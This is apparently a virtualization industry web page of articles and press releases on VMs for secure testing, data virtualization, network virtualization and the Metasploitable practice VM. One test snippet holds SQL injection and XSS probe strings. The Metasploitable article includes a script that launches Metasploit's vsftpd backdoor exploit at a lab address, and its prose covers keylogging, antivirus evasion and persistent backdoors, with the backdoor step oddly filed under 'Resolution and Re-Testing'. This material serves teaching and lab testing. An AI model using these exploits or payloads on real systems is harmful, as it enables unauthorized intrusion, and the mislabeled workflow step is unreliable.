Data virtualization key to healthcare's next wave

Few industries have reaped the benefits of today's digital world more than healthcare. The digital revolution has streamlined access to data, allowing for more accurate and comprehensive patient care across the care continuum.

Spotlight

Silicus

Silicus is a cloud transformation services company, focused on helping enterprises drive cloud-enabled business innovation & modernization, deploy differentiation at scale, and manage technology investments through their lifecycle.

OTHER ARTICLES
Server Virtualization

VM Applications for Software Development and Secure Testing

Article | May 17, 2023

Contents
1. Introduction
2. Software Development and Secure Testing
3. Using VMs in Software Development and Secure Testing
4. Conclusion

1. Introduction

"Testing is an infinite process of comparing the invisible to the ambiguous in order to avoid the unthinkable happening to the anonymous." —James Bach

Testing software is crucial for identifying and fixing security vulnerabilities. However, meeting quality standards for functionality and performance does not guarantee security. Software testing is therefore essential for identifying and addressing application security vulnerabilities in order to maintain the following:

Security of data history, databases, information, and servers
Customers' integrity and trust
Web application protection from future attacks

VMs provide a flexible and isolated environment for software development and security testing. They offer easy replication of complex configurations and testing scenarios, allowing efficient issue resolution. VMs also provide secure testing by isolating applications from the host system and enabling a reset to a previous state. In addition, they facilitate DevOps practices and streamline the development workflow.

2. Software Development and Secure Testing

Software Secure Testing: The Approach

The following approaches must be considered while preparing and planning for security tests:

Architecture Study and Analysis: Understand whether the software meets the necessary requirements.
Threat Classification: List all potential threats and risk factors that must be tested.
Test Planning: Run the tests based on the identified threats, vulnerabilities, and security risks.
Testing Tool Identification: The developer must identify the security testing tools relevant to the software and its specific use cases.
Test-Case Execution: After a security test uncovers an issue, the developer should fix it, either with suitable open-source code or manually.
Reports: Prepare a detailed report of the security tests performed, containing a list of the vulnerabilities, threats, and issues resolved and the ones that are still pending.

Ensuring the security of an application that handles essential functions is paramount. This may involve safeguarding databases against malicious attacks or implementing fraud detection mechanisms for incoming leads before integrating them into the platform. Maintaining security is crucial throughout the software development life cycle (SDLC) and must be at the forefront of developers' minds while executing the software's requirements. With consistent effort, the SDLC pipeline addresses security issues before deployment, reducing the risk of discovering application vulnerabilities and minimizing the damage they could cause.

A secure SDLC makes developers responsible for critical security, and developers need to be aware of potential security concerns at each step of the process. This requires integrating security into the SDLC in ways that were not needed before. Because anyone can potentially access source code, coding with potential vulnerabilities in mind is essential. As such, having a robust and secure SDLC process is critical to ensuring applications are not subject to attacks by hackers.
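As a concrete illustration of the test-case execution step, a minimal automated check like the sketch below can run in the SDLC pipeline on every build. It is only a sketch: the staging URL, the parameter name, and the payload list are hypothetical placeholders, and it assumes the pytest and requests packages are available.

# security_smoke_test.py - a minimal, hypothetical security check run in CI.
# The endpoint, parameter name, and payloads below are illustrative placeholders.
import pytest
import requests

STAGING_URL = "https://staging.example.internal/search"  # hypothetical endpoint

INJECTION_PAYLOADS = [
    "' OR '1'='1' --",            # classic SQL injection probe
    "<script>alert(1)</script>",  # reflected XSS probe
]

@pytest.mark.parametrize("payload", INJECTION_PAYLOADS)
def test_endpoint_rejects_malicious_input(payload):
    """The endpoint should neither error out nor echo the payload back verbatim."""
    response = requests.get(STAGING_URL, params={"q": payload}, timeout=10)

    # A 5xx status suggests the payload reached an unprepared code path.
    assert response.status_code < 500

    # Echoing the raw payload back unescaped is a sign of a reflection flaw.
    assert payload not in response.text

A failing check of this kind blocks the deployment and feeds directly into the test report described above.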
3. Using VMs in Software Development and Secure Testing

Snapshotting: Snapshotting allows developers to capture a VM's state at a specific point in time and restore it later. This feature is helpful for debugging and enables developers to roll back to a previous state when an error occurs. A virtual machine provides several operations for creating and managing snapshots and snapshot chains. These operations let users create snapshots, revert to any snapshot in the chain, and remove snapshots. In addition, extensive snapshot trees can be created to streamline the workflow.

Virtual Networking: Virtual networking allows virtual machines to be connected to virtual networks that simulate complex network topologies, letting developers test their applications in different network environments. It also allows data centers to be expanded across multiple physical locations, giving access to a plethora of more efficient options. This empowers teams to modify the network as requirements change, without any additional hardware. Moreover, provisioning the network for specific applications and needs offers greater flexibility, and workloads can be moved seamlessly across the network infrastructure without compromising service, security, or availability.

Resource Allocation: VMs can be configured with specific resource allocations such as CPU, RAM, and storage, allowing developers to test their applications under different resource constraints. Maintaining a 1:1 ratio between virtual machine processors and host cores is highly recommended; over-subscribing virtual machine processors to a single core can lead to stalled or delayed events, causing significant frustration and dissatisfaction among users. That said, IT administrators sometimes do overallocate virtual machine processors. In such cases, a practical approach is to start with a 2:1 ratio and gradually move towards 4:1, 8:1, 12:1, and so on while bringing virtual allocation into the IT infrastructure. This approach ensures a safe and seamless transition towards optimized virtual resource allocation.

Containerization within VMs: Containerization within VMs provides an additional layer of isolation and security for applications. Enterprises are finding new use cases for VMs to utilize their in-house and cloud infrastructure to support heavy-duty application and networking workloads, which also has a positive impact on the environment. DevOps teams use containerization together with virtualization to improve software development flexibility. Containers package applications with the necessary components, such as code, system tools, and libraries. For complex applications, virtual machines and containers are used together: containers typically host the front end and middleware, while VMs host the back end.

VM Templates: VM templates are pre-configured virtual machines that can be used as a base for creating new virtual machines, making it easier to set up development and testing environments. A VM template is an image of a virtual machine that serves as a master copy; it includes the VM's disks, virtual devices, and settings. By using a VM template, a virtual machine can be cloned multiple times, and the clones are independent and not linked to the template. VM templates are handy when a large number of similar VMs need to be deployed, and they preserve VM consistency. To edit a template, convert it to a VM, make the necessary changes, and then convert the edited VM back into a new template.
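The templating and snapshotting features above can be combined into a simple clone-then-snapshot workflow for test environments. The sketch below assumes a local libvirt/KVM host with the virt-clone and virsh command-line tools installed; the template and VM names are hypothetical placeholders, not a prescribed setup.

# provision_test_vm.py - a minimal sketch of a clone-then-snapshot workflow on a
# local libvirt/KVM host. Assumes virt-clone and virsh are installed; the template
# and VM names are hypothetical placeholders.
import subprocess

TEMPLATE = "ubuntu-22.04-template"   # hypothetical master template
TEST_VM = "secure-test-01"           # hypothetical clone name

def run(*args):
    """Run a command and fail loudly on a non-zero exit code."""
    subprocess.run(args, check=True)

# 1. Clone an independent VM from the master template.
run("virt-clone", "--original", TEMPLATE, "--name", TEST_VM, "--auto-clone")

# 2. Boot the clone and record a clean baseline snapshot.
run("virsh", "start", TEST_VM)
run("virsh", "snapshot-create-as", TEST_VM, "baseline", "Clean state before testing")

# ... run destructive or security tests against TEST_VM here ...

# 3. Roll the VM back to the baseline so the next run starts from a known state.
run("virsh", "snapshot-revert", TEST_VM, "baseline")

Because the clone is independent of the template and the baseline snapshot is cheap to revert, each test run starts from an identical, known-good state.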
Remote Access: VMs can be accessed remotely, allowing developers and testers to collaborate more effectively from anywhere in the world. To manage a virtual machine remotely, enable remote access, connect to the virtual machine, and then access the VNC or serial console. Once connected, full permission to manage the virtual machine is granted with the user's approval. Remote access provides a secure way to reach VMs, as connections can be encrypted and authenticated to prevent unauthorized access. It also simplifies management, since administrators can monitor and control virtual machines from a central location.

DevOps Integration: DevOps is a collection of practices, principles, and tools that allow a team to release software quickly and efficiently. Virtualization is vital in DevOps when developing intricate cloud, API, and SOA systems. Virtual machines enable teams to simulate environments for creating, testing, and launching code, ultimately preserving computing resources. When commencing a bug search at the API layer, teams find that virtual machines are well suited to test-driven development (TDD). Virtualization providers handle updates, freeing DevOps teams to focus on other areas and increasing productivity by 50–60%. In addition, VMs allow for simultaneous testing of multiple release and patch levels, improving product compatibility and interoperability.

4. Conclusion

The outlook for virtual machine applications is highly promising in the development and testing fields. With the increasing complexity of development and testing processes, VMs can significantly simplify and streamline these operations. In the future, VMs are expected to become even more versatile and potent, providing developers and testers with a broader range of tools and capabilities to facilitate the development process. One potential future development is the integration of machine learning and artificial intelligence into VMs, which would enable VMs to automate various tasks, optimize the allocation of resources, and generate recommendations based on performance data. Moreover, VMs may become more agile and lightweight, allowing developers and testers to spin instances up and down more efficiently. The future of VM applications for software development and security testing looks bright, with continued innovation expected to provide developers and testers with even more powerful and flexible tools to improve the software development process.

Read More
Server Hypervisors

How to Start Small and Grow Big with Data Virtualization

Article | September 9, 2022

Why Should Companies Care about Data Virtualization?

Data is everywhere. With each passing day, companies generate more data than ever before, and what exactly can they do with all this data? Is it just a matter of storing it? Or should they manage and integrate their data from various sources? How can they store, manage, integrate, and utilize their data to gain information that is of critical value to their business?

As they say, knowledge is power, but knowledge without action is useless. This is where the Denodo Platform comes in. The Denodo Platform gives companies the flexibility to evolve their data strategies, migrate to the cloud, or logically unify their data warehouses and data lakes, without affecting business. This powerful platform offers a variety of subscription options that can benefit companies immensely. For example, companies often start out with individual projects using a Denodo Professional subscription, but in a short period of time they end up adding more and more data sources and move on to other Denodo subscriptions such as Denodo Enterprise or Denodo Enterprise Plus. The upgrade process is very easy; in fact, it can be done in less than a day once the cloud marketplace is chosen (Amazon Web Services (AWS), Microsoft Azure, or Google Cloud Platform (GCP)). In as little as six weeks, companies can realize real business benefits from managing and utilizing their data effectively.

A Bridging Layer

Data virtualization has been around for quite some time now. Denodo's founders, Angel Viña and Alberto Pan, have been involved in data virtualization from as far back as the 1990s. If you're not familiar with data virtualization, here is a quick summary. Data virtualization is the cornerstone of a logical data architecture, whether it be a logical data warehouse, logical data fabric, data mesh, or even a data hub. All of these architectures are best served by our principles: Combine (bring together all your data sources), Connect (into a logical single view), and Consume (through standard connectors to your favorite BI/data science tools or through our easy-to-use, robust APIs). Data virtualization is the bridge that joins multiple data sources to fuel analytics. It is also the logical data layer that effectively integrates data silos across disparate systems, manages unified data for centralized security, and delivers it to business users in real time.

Economic Benefits in Less Than Six Weeks with Data Virtualization?

In a short duration, how can companies benefit from choosing data virtualization as a data management solution? To answer this question, below are some very interesting KPIs discussed in the recently released Forrester study on the Total Economic Impact of Data Virtualization. For example, companies that have implemented data virtualization have seen an 83% increase in business user productivity. Mainly this is due to the business-centric way a data virtualization platform is delivered: when you implement data virtualization, you provide business users with an easy-to-access, democratized interface to their data. The second KPI to note is a 67% reduction in development resources. With data virtualization, you connect to the data, you do not copy it. This means once it is set up, there is a significant reduction in the need for data integration engineers, as data remains in the source location and is not copied around the enterprise.
Finally, companies are reporting a 65% improvement in data access speeds above and beyond more traditional approaches such as extract, transform, and load (ETL) processes.

A Modern Solution for an Age-Old Problem

To understand how data virtualization can help elevate projects to an enterprise level, we can share a few use cases in which companies have leveraged data virtualization to solve their business problems across several different industries. For example, in finance and banking we often see use cases in which data virtualization is used as a unifying platform to help improve compliance and reporting. In retail, we see use cases including predictive analytics in supply chains as well as next-best actions derived from a unified view of the customer. Data virtualization is also used in a wide variety of other settings, such as healthcare and government agencies, where organizations use the Denodo Platform to help data scientists understand key trends and activities, both sociologically and economically. In a nutshell, if data exists in more than one source, then the Denodo Platform acts as the unifying platform that connects, combines, and allows users to consume the data in a timely, cost-effective manner.
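To make the connect-combine-consume idea concrete, the sketch below federates two file-based sources behind a single logical view using the open-source DuckDB engine. This is only a conceptual illustration of query-in-place data virtualization, not the Denodo Platform itself; the file names and column names are hypothetical placeholders.

# logical_view_demo.py - a conceptual sketch of the connect/combine/consume pattern,
# using DuckDB to query two sources in place instead of copying them into a warehouse.
# The file names and column names are hypothetical placeholders.
import duckdb

con = duckdb.connect()  # in-memory engine acting as the logical layer

# Connect + combine: expose two physical sources behind one logical view.
con.execute("""
    CREATE VIEW customer_360 AS
    SELECT c.customer_id, c.region, o.order_total
    FROM read_csv_auto('crm_customers.csv') AS c
    JOIN read_parquet('orders.parquet')     AS o
      ON o.customer_id = c.customer_id
""")

# Consume: business users or BI tools query the view; the data stays at the source.
rows = con.execute(
    "SELECT region, SUM(order_total) AS revenue FROM customer_360 GROUP BY region"
).fetchall()
print(rows)

The view is only a definition; nothing is materialized or copied, which is the property behind the reduction in data integration effort described above.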

Read More
Virtual Desktop Strategies

Network Virtualization: Gaining a Competitive Edge

Article | July 26, 2022

Network virtualization (NV) is the act of combining a network's physical hardware into a single virtual network. This is often accomplished by running several virtual guest machines in software containers on a single physical host system. Network virtualization is the gold standard for networking, and it is being adopted by enterprises of all kinds globally. By integrating their existing network gear into a single virtual network, enterprises can reduce operating expenses, automate network and security processes, and set the stage for future growth. Businesses can use virtualization to imitate many types of traditional hardware, including servers, storage devices, and network resources.

Three Forces Driving Network Virtualization

Demand for enterprise networks keeps rising, driven by higher end-user demands and the proliferation of devices and business software. Through network virtualization, IT organizations are gaining the ability to respond to evolving needs and match their networking capabilities with their virtualized storage and computing resources. According to a recent SDxCentral survey, 88% of respondents believe that adopting a network virtualization solution is "mission critical" and that it is necessary to help IT address the immediate requirements of flexibility, scalability, and cost savings (both OpEx and CapEx) in the data center.

Speed

Consider any business today: everything depends on IT's capacity to support business operations. When a company wants to surprise its clients with a new app, launch a competitive offer, or pursue a fresh route to market, it requires immediate IT assistance. That means IT must move considerably more swiftly, and networks must evolve at the rapid speed of a digitally enabled organization.

Security

According to a PricewaterhouseCoopers survey, the average organization experiences two successful cyberattacks every week. Perimeter security alone is insufficient to stem the flood, and network experts are called upon to provide a better solution. The new data center security approach will:

Be software-based
Use the micro-segmentation principle
Adopt a Zero Trust (ZT) paradigm

In an ideal world, there would be no distinction between trusted and untrusted networks or segments, but a ZT model necessitates a network virtualization technology that allows micro-segmentation.

Flexibility

Thanks to the emergence of server virtualization, applications are no longer tied to a specific physical server in a single location. Applications can now be replicated to a secondary data center for disaster recovery, moved from one corporate data center to another, or slipped into a hybrid cloud environment. The problem is that network configuration is hardware-dependent, and hardwired networking connections restrict application mobility. Because networking services vary significantly from one data center to the next, and an in-house data center differs from a cloud, extensive customization is required to make applications work in different network environments, which is a significant barrier to app mobility and another compelling reason to adopt network virtualization.

Closing Lines

Network virtualization is indeed a technology for the future. These characteristics of network virtualization platforms will benefit more companies as CIOs become more involved in organizational processes. As consumer demand for real-time solutions grows, businesses will be forced to explore network virtualization as the best way to take their networks to the next level.

Read More
Virtual Desktop Tools, Server Hypervisors

Metasploitable: A Platform for Ethical Hacking and Penetration Testing

Article | June 8, 2023

Contents
1. Overview
2. Ethical Hacking and Penetration Testing
3. Metasploit Penetration Test
4. Why Choose Metasploit Framework for your Business?
5. Closing Remarks

1. Overview

Metasploitable refers to an intentionally vulnerable virtual machine that enables the learning and practice of Metasploit. Metasploit is one of the best penetration testing frameworks, helping businesses discover and shore up their systems' vulnerabilities before hackers exploit them. Security engineers use Metasploit as a penetration testing system and as a development platform that allows the creation of security tools and exploits. Metasploit's various user interfaces, libraries, tools, and modules allow users to configure an exploit module, pair it with a payload, point it at a target, and launch it at the target system. In addition, Metasploit's extensive database houses hundreds of exploits and several payload options.

2. Ethical Hacking and Penetration Testing

An ethical hacker is one who works within a security framework and checks for bugs that a malicious hacker might use to exploit networks. They use their experience and skills to help keep the cyber environment safe. To protect infrastructure from the threats that hackers pose, ethical hacking is essential. The main purpose of an ethical hacking service is to assess and report on the safety of the targeted systems and networks for the owner. Ethical hacking is performed with penetration testing techniques to evaluate security loopholes. Techniques used to gather information and exploit it include:

Information gathering
Vulnerability scanning
Exploitation
Test analysis

Ethical hacking also relies on automated methods; the hacking process without automated software is inefficient and time-consuming. There are several tools and methods that can be used for ethical hacking and penetration testing. The Metasploit Framework eases the effort of exploiting vulnerabilities in networks, operating systems, and applications, and of generating new exploits for new or unknown vulnerabilities.

3. Metasploit Penetration Test

Reconnaissance: Integrate Metasploit with various reconnaissance tools to find the vulnerable spot in the system.
Threat Modeling and Vulnerability Identification: Once a weakness is identified, choose an exploit and payload for penetration.
Exploitation: If the exploit (a tool used to take advantage of a system weakness) is successful, the payload gets executed at the target, and the user gets a shell for interacting with the payload (shellcode is a small piece of code used as the payload). The most popular payload for attacking Windows systems is Meterpreter, an in-memory-only interactive shell. (Meterpreter is a Metasploit attack payload that provides an interactive shell for the attacker to explore the target machine and execute code.) Other payloads are: static payloads (which enable port forwarding and communications between networks), dynamic payloads (which let testers generate unique payloads to evade antivirus software), and command shell payloads (which enable users to run scripts or commands against a host).
Post-Exploitation: Once on the target machine, Metasploit offers various tools for privilege escalation, packet sniffing, keylogging, screen capture, and pivoting.
Resolution and Re-Testing: Users set up a persistent backdoor in case the target machine gets rebooted.

These available features in Metasploit make it easy to configure as per the user's requirements.
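The workflow above can be scripted end to end. The sketch below drives msfconsole with a resource script against a Metasploitable 2 lab VM; it assumes msfconsole is installed and that the target runs only on an isolated lab network, and the IP address shown is a hypothetical placeholder.

# run_lab_exploit.py - a minimal sketch of scripting the penetration test workflow.
# Assumes msfconsole is installed and a Metasploitable 2 VM is reachable only on an
# isolated lab network; the IP address below is a hypothetical placeholder.
import subprocess
import tempfile

LAB_TARGET = "192.168.56.101"  # hypothetical Metasploitable 2 address

# A Metasploit resource script: the same commands could be typed into msfconsole.
RESOURCE_SCRIPT = f"""
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS {LAB_TARGET}
set payload cmd/unix/interact
exploit -z
sessions -l
exit
"""

with tempfile.NamedTemporaryFile("w", suffix=".rc", delete=False) as rc:
    rc.write(RESOURCE_SCRIPT)
    rc_path = rc.name

# -q suppresses the banner, -r replays the resource script non-interactively.
subprocess.run(["msfconsole", "-q", "-r", rc_path], check=True)

The vsftpd backdoor module is one of the classic exercises against Metasploitable 2; any module and payload pairing from the framework's database can be substituted in the same way.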
4. Why Choose Metasploit Framework for your Business?

Significant advantages of the Metasploit Framework are discussed below:

Open-source: The Metasploit Framework is actively developed as open-source software, so most companies prefer it as they grow their businesses.
Easy usage: It is very easy to use, with an intuitive naming convention for its commands. This also facilitates building an extensive penetration test of the network.
GUI environment: It provides friendly third-party interfaces that ease penetration testing projects with facilities such as button clicks, on-the-fly vulnerability management, and easy-to-switch workspaces, among others.
Cleaner exits: Metasploit can exit cleanly without detection, even if the target system does not restart after a penetration test. Additionally, it offers various options for maintaining persistent access to the target system.
Easy switching between payloads: Metasploit allows testers to change payloads easily with the 'set payload' command. It offers flexibility for system penetration through shell-based access or Meterpreter.

5. Closing Remarks

From DevSecOps experts to hackers, everyone uses the Ruby-based open-source framework Metasploit, which allows testing via command-line alterations or a GUI. Metasploitable is a vulnerable virtual machine ideally suited for ethical hacking and penetration testing in VM security. One trend likely to impact the future of Metasploitable is the increasing use of cloud-based environments for testing and production. It is possible that Metasploitable could be adapted to work in cloud environments, or that new tools will be developed specifically for cloud-based penetration testing. Another trend that may shape its future is the growing importance of automation in security testing, so Metasploitable could be adapted to include more automation features. The future of Metasploitable looks bright as it continues to be a valuable tool for security professionals and enthusiasts. As the security landscape continues to evolve, it will be interesting to see how Metasploitable adapts to meet the community's changing needs.

Read More

Related News

Virtual Desktop Tools, Virtual Desktop Strategies, Server Virtualization

Netskope Delivers the Next Evolution in Digital Experience Management for SASE with Proactive DEM

PR Newswire | September 01, 2023

Netskope, a leader in Secure Access Service Edge (SASE), today announced the launch of Proactive Digital Experience Management (DEM) for SASE, elevating best practice from the current reactive monitoring tools to proactive user experience management. Proactive DEM provides experience management capabilities across the entire SASE architecture, including Netskope Intelligent SSE, Netskope Borderless SD-WAN and Netskope NewEdge global infrastructure. Digital Experience Management technology has become increasingly crucial amid digital business transformation, with organizations seeking to enhance customer experiences and improve employee engagement. With hybrid work and cloud infrastructure now the norm globally, organizations have struggled to ensure consistent and optimized experiences alongside stringent security requirements. Gartner predicts that "by 2026, at least 60% of I&O leaders will use DEM to measure application, services and endpoint performance from the user's viewpoint, up from less than 20% in 2021." However, monitoring applications, services, and networks is only part of a modern DEM experience, and so Netskope Proactive DEM goes beyond observation, providing Machine Learning (ML)-driven functionality to anticipate, and automatically remediate, problems. Sanjay Beri, CEO and co-founder of Netskope commented, "Ensuring a constantly optimized experience is essential for organizations looking to support the best productivity returns for hybrid workers and modern cloud infrastructure, but monitoring alone is not enough. Customers have told us of the challenges they face managing a multi-vendor cloud ecosystem and so we have yet again innovated beyond industry standards, providing experience management that can both monitor and proactively remediate." For issue identification, Netskope Proactive DEM uniquely combines Synthetic Monitoring with Real User monitoring, creating SMART monitoring (Synthetic Monitoring Augmentation for Real Traffic). This enables full end-to-end 'hop-by-hop' visibility of data, and the proactive identification of experience-impacting events. SMART monitoring enables organizations to anticipate potential events that might impact upon network and application experience. While most SASE vendors rely on "gray cloud" infrastructure - built on public cloud - which limits their ability to granularly identify and control any issues, Proactive DEM leverages Netskope NewEdge - the industry's largest private cloud infrastructure - to deliver 360 visibility and control of end-to-end user experience while providing mitigation of issues, including using various self-healing mechanisms, before the user recognizes their experience has degraded. About Netskope Netskope, a global SASE leader, helps organizations apply zero trust principles and AI/ML innovations to protect data and defend against cyber threats. Fast and easy to use, the Netskope platform provides optimized access and real-time security for people, devices, and data anywhere they go. Netskope helps customers reduce risk, accelerate performance, and get unrivaled visibility into any cloud, web, and private application activity. Thousands of customers trust Netskope and its powerful NewEdge network to address evolving threats, new risks, technology shifts, organizational and network changes, and new regulatory requirements.

Read More

Virtual Desktop Tools, Server Hypervisors

Meter Partners with Cloudflare to Launch DNS Security

Business Wire | August 31, 2023

Meter, Inc., a leader in Network as a Service (NaaS) for businesses, today announced DNS Security, built in partnership with Cloudflare, the security, performance, and reliability company. Meter DNS Security is now widely available for all Meter Network customers, expanding Meter’s existing NaaS offering and saving teams both time and money, while also improving overall network performance and security, powered by Cloudflare’s Zero Trust platform. “With the number of devices on a network expected to triple by 2030, modern businesses and organizations demand enterprise network controls to ensure safety and peak performance for business critical functions,” said Anil Varanasi, CEO and co-founder of Meter. “Meter DNS Security is the latest example of how we’re continuing to offer our customers enterprise level networks end-to-end. Through our partnership with Cloudflare, we’re enhancing our capabilities to meet the needs of IT professionals at industrial warehouses, educational institutions, security firms, and more.” Meter DNS Security eliminates the hassle of having multiple vendors by providing content filtering at several layers to all customers within the Meter Dashboard, in partnership with one of the best providers in the world. “We’re proud to have Meter leveraging Cloudflare’s Zero Trust platform in a new way, offering our DNS filtering feature natively built into their Meter Dashboard,” said John Graham-Cumming, CTO, Cloudflare. “By building on Cloudflare's platform, Meter enables customers to manage their team’s operations at scale, as well as effectively enforce global corporate policies across diverse corporate spaces, such as offices, schools, and warehouses.” In addition to the ease and scalability of Meter DNS Security, users are ensuring security through enhanced compliance by blocking access to known malicious websites and bad actors. The integration and partnership with Cloudflare provides customers with faster DNS response times, while optimizing network performance by limiting access to high-bandwidth websites and services. Real-world examples of this process include, but are not limited to:

Ensuring a safe browsing environment at schools by filtering out age-inappropriate content
Optimizing network performance for warehouses by filtering high-bandwidth activities like video streaming
Maintaining high security and compliance standards by filtering malicious or illegal content

“Tishman Speyer has successfully partnered with Meter to streamline the networking and Wi-Fi experience for our customers,” said Simon Okunev, Managing Director and Chief Information Officer, Tishman Speyer. “The addition of Meter’s DNS Security feature, powered by Cloudflare, will further benefit our customers by providing an additional layer of security.” About Cloudflare Cloudflare, Inc. is on a mission to help build a better Internet. Cloudflare’s suite of products protect and accelerate any Internet application online without adding hardware, installing software, or changing a line of code. Internet properties powered by Cloudflare have all web traffic routed through its intelligent global network, which gets smarter with every request. As a result, they see significant improvement in performance and a decrease in spam and other attacks. Cloudflare was awarded by Reuters Events for Global Responsible Business in 2020, named to Fast Company's Most Innovative Companies in 2021, and ranked among Newsweek's Top 100 Most Loved Workplaces in 2022.

Read More

Server Hypervisors, vSphere

Napatech Leverages Latest Intel Agilex® FPGA to Launch Industry's first 400Gbps SmartNIC Solutions

PR Newswire | August 29, 2023

Napatech™ (OSLO: NAPA.OL), a leading provider of programmable Smart Network Interface Cards (SmartNICs) and Infrastructure Processing Units (IPU) used in cloud, enterprise and telecom datacenter networks, today announced the availability of Napatech's first 400Gbps programmable SmartNIC solutions, leveraging the latest Intel Agilex® 7 FPGAs to deliver best-in-class performance for applications in security, cloud services, network monitoring and recording. Enterprises and OEMs providing high-performance solutions for network monitoring and recording require NICs with a performance level that matches the high PCI Express (PCIe) bandwidth available in the latest servers such as those based on 4th Gen Intel Xeon® Scalable Processors. The new Napatech NT400 SmartNIC platform, based on the Intel® FPGA SmartNIC N6000-PL Platform, addresses this need through a PCIe Gen 4 16-lane host interface which enables full-duplex 2x100Gbps traffic between network ports and host applications. Similarly, for applications like the 5G packet core in telecom infrastructure that require high-bandwidth inline processing of network data, the NT400 platform sustains a total of 400G of traffic over tens of millions of flows. The NT400 programmable SmartNIC platform includes two QSFP56 network ports, supporting up to 2x200G traffic with the flexibility to configure 10G, 25G, 40G, 50G, 100G and 200G network links. The SmartNIC hardware is complemented by Napatech's portfolio of production-grade software packages, including Link-Capture™ for use cases such as network monitoring and recording, Link-Virtualization™ that provides a virtualized data plane for cloud services and Link-Inline™ for inline applications such as 5G User Plane Function (UPF). These integrated solutions deliver a true "IT experience" whereby the user just installs the card and the software, immediately achieving seamless acceleration of their application with no requirement to directly program the SmartNIC itself. At the core of the NT400 platform is the Intel Agilex 7 FPGA F-Tile chiplet, which incorporates a configurable, hardened Ethernet protocol stack for supporting rates from 10G to 400G. Napatech chose the Intel Agilex 7 FPGA for a host of reasons, including scalability options that allow support for five different configurations that meet various price, performance, power and feature goals, tailored to specific customer applications and use cases. The F-Tile features are critical in enabling the NT400 to operate within the space and power limitations of standard servers deployed in network appliances, data centers and edge locations. "As the networking landscape continues to evolve, SmartNICs emerge as the predominant growth catalyst in the expansive NIC market, poised to reach $3.3 billion annually by 2025," said Manoj Sukumaran, Principal Analyst for Datacenter Compute and Networking at Omdia. "High bandwidth programmable Ethernet adapters require very fine optimization in hardware and software to ensure deterministic and predictable processing time, making them suitable for real-time networking applications. Napatech is among the very few vendors who could provide highly optimized SmartNICs and software solutions leveraging FPGAs from vendors like Intel, and deliver highly efficient network offload capabilities," he added. "The NT400 platform represents the latest generation within our portfolio of SmartNIC solutions," said Jarrod Siket, Chief Marketing Officer at Napatech. 
"We will deliver multiple SKUs based on this platform, providing products with memory configurations as well features like time synchronization and management ports that are precisely tuned to the requirements of our customers' applications, all packaged with the applicable production-grade software." "We are delighted to see Napatech choose the Intel Agilex 7 FPGA for their leading-edge SmartNIC solutions," said Mike Fitton, Vice President Programmable Solutions Group and General Manager, Network Business Division at Intel. "The combination of our FPGAs, which deliver high performance, and power efficiency plus a rich feature set for the most demanding applications, together with Napatech's production-grade hardware and software, helps ensure that customers can deliver leading solutions for a wide range of enterprise and telecom applications." About Napatech Napatech is the leading supplier of SmartNIC solutions used in cloud, enterprise, and telecom datacenters. Through commercial-grade software suites integrated with high-performance hardware, Napatech accelerates network infrastructure and security workloads to deliver best-in-class system-level performance while maximizing the availability of server compute resources for applications and services.

Read More

Events

ICVARS 2024

Conference
